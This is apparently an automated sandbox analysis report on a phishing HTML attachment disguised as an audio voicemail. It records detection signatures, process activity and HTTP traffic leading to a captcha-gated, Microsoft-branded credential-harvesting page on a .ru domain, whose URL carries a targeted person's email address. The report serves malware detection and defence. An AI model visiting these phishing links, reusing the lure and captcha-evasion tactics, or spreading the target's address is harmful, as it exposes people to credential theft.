Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Play_NewMessage_17Jan2024_Audio.htm

Overview

General Information

Sample name:Play_NewMessage_17Jan2024_Audio.htm
Analysis ID:1376210
MD5:6fa38136fddb0a5e0d3bea8efd584139
SHA1:a63c0071d2c11100331f24a781d2c51051b80d16
SHA256:cd58af903450c8d21cd931824dfeaf93779370795a8e834104bf46488b41eb75
Infos:

Detection

HTMLPhisher
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
HTML file submission requesting Cloudflare captcha challenge
Yara detected HtmlPhish62
HTML document with suspicious name
HTML document with suspicious title
Phishing site detected (based on image similarity)
Creates files inside the system directory
HTML body contains low number of good links
HTML page contains hidden URLs or javascript code
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Invalid T&C link found
JA3 SSL client fingerprint seen in connection with other malware

Classification

  • System is w10x64
  • chrome.exe (PID: 1076 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Play_NewMessage_17Jan2024_Audio.htm MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4520 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=2020,i,7882445477630509628,3060162036037396328,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.1.pages.csvJoeSecurity_HtmlPhish_62Yara detected HtmlPhish_62Joe Security
    1.2.pages.csvJoeSecurity_HtmlPhish_62Yara detected HtmlPhish_62Joe Security
      1.4.pages.csvJoeSecurity_HtmlPhish_62Yara detected HtmlPhish_62Joe Security
        1.7.pages.csvJoeSecurity_HtmlPhish_62Yara detected HtmlPhish_62Joe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://2r1.nhvw4is.ru/#Lkmoran@moog.comSlashNext: Label: Credential Stealing type: Phishing & Social Engineering

          Phishing

          barindex
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: Yara matchFile source: 1.2.pages.csv, type: HTML
          Source: Yara matchFile source: 1.4.pages.csv, type: HTML
          Source: Yara matchFile source: 1.7.pages.csv, type: HTML
          Source: file:///C:/Users/user/Desktop/Play_NewMessage_17Jan2024_Audio.htmTab title: Play_NewMessage_17Jan2024_Audio.htm
          Source: file:///C:/Users/user/Desktop/Play_NewMessage_17Jan2024_Audio.htmMatcher: Found strong image similarity, brand: MICROSOFT
          Source: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29tHTTP Parser: Number of links: 0
          Source: https://2r1.nhvw4is.ru/#Lkmoran@moog.comHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head><title>jVfShLoxFQOIICveIbhuvUS</title><meta charset="UTF-8"><meta name="lang" content="en"><meta name="viewport" content="width=device-width, initial-scale=1"><script src="https://challenges.cloudflare.com/turnstile/v0...
          Source: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29tHTTP Parser: Invalid link: CADtIacfKKxHJEF3xp3v5QaQH3r7OaApOI54OjnPSahtGwqb0HNCVtqea43n0GlqWFiBUh7igkn4QzteE7whElp5oa6ETDbU oAyxM98u4YmBOklGfxQp5biSxnezlD5KNYG2Qk0ehPuE8VfAde!
          Source: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29tHTTP Parser: <input type="password" .../> found
          Source: Play_NewMessage_17Jan2024_Audio.htmHTTP Parser: No favicon
          Source: file:///C:/Users/user/Desktop/Play_NewMessage_17Jan2024_Audio.htmHTTP Parser: No favicon
          Source: https://2r1.nhvw4is.ru/#Lkmoran@moog.comHTTP Parser: No favicon
          Source: https://2r1.nhvw4is.ru/#Lkmoran@moog.comHTTP Parser: No favicon
          Source: https://2r1.nhvw4is.ru/#Lkmoran@moog.comHTTP Parser: No favicon
          Source: https://2r1.nhvw4is.ru/#Lkmoran@moog.comHTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hq0sk/0x4AAAAAAAQGgmt388O38mZL/auto/normalHTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hq0sk/0x4AAAAAAAQGgmt388O38mZL/auto/normalHTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/1af7i/0x4AAAAAAAQGgmt388O38mZL/auto/normalHTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/1af7i/0x4AAAAAAAQGgmt388O38mZL/auto/normalHTTP Parser: No favicon
          Source: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29tHTTP Parser: No favicon
          Source: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29tHTTP Parser: No <meta name="author".. found
          Source: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29tHTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49747 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:49767 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:49823 version: TLS 1.2
          Source: Joe Sandbox ViewIP Address: 151.101.193.229 151.101.193.229
          Source: Joe Sandbox ViewIP Address: 152.199.4.73 152.199.4.73
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
          Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
          Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.132Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /logos/0028/7193/logox_0.png?EmnBtwANKGaTAXRVsmKicbCmMa HTTP/1.1Host: cascade-madmimi-com.translate.googConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /logos/0028/7193/logox_0.png?EmnBtwANKGaTAXRVsmKicbCmMa HTTP/1.1Host: cascade-madmimi-com.translate.googConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://2r1.nhvw4is.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /npm/bootstrap@5.0.2/dist/css/bootstrap.min.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://2r1.nhvw4is.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/c8377512/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://2r1.nhvw4is.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hq0sk/0x4AAAAAAAQGgmt388O38mZL/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://2r1.nhvw4is.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8470083bba6a4201 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hq0sk/0x4AAAAAAAQGgmt388O38mZL/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hq0sk/0x4AAAAAAAQGgmt388O38mZL/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2r1.nhvw4is.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8470083bba6a4201/1705509546863/OYQPYviXYsx_AMf HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hq0sk/0x4AAAAAAAQGgmt388O38mZL/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8470083bba6a4201/1705509546867/1ec3802d3c0fe85725e4418799a952df871d31a0bb5d01c39c101922f073ad92/rFQtMclzeP7ExH9 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hq0sk/0x4AAAAAAAQGgmt388O38mZL/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1672084046:1705509045:1KRCh9wlmdHNe1_uWjab1xjgCNY1yb1dMySJtbe4upc/8470083bba6a4201/20178212f2891c9 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8470083bba6a4201/1705509546863/OYQPYviXYsx_AMf HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dGeXFcO742e+8lY&MD=v78ASCbe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/1af7i/0x4AAAAAAAQGgmt388O38mZL/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://2r1.nhvw4is.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=847008825fbf8ce0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/1af7i/0x4AAAAAAAQGgmt388O38mZL/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1672084046:1705509045:1KRCh9wlmdHNe1_uWjab1xjgCNY1yb1dMySJtbe4upc/8470083bba6a4201/20178212f2891c9 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1369030472:1705508754:EmThWJxmRohva1owlnsvJ5GEpCR6N4Hxvwfz_SQ26Ik/847008825fbf8ce0/150b112ab8f1d86 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/847008825fbf8ce0/1705509558146/ATHlue7vcGlmiy5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/1af7i/0x4AAAAAAAQGgmt388O38mZL/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/847008825fbf8ce0/1705509558146/ATHlue7vcGlmiy5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/847008825fbf8ce0/1705509558147/42cd1f2bd49e95087981761b7cf53c90b1554ff299170fbe1e6299d6d5f703db/VKvcEsHybHjFSnE HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/1af7i/0x4AAAAAAAQGgmt388O38mZL/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
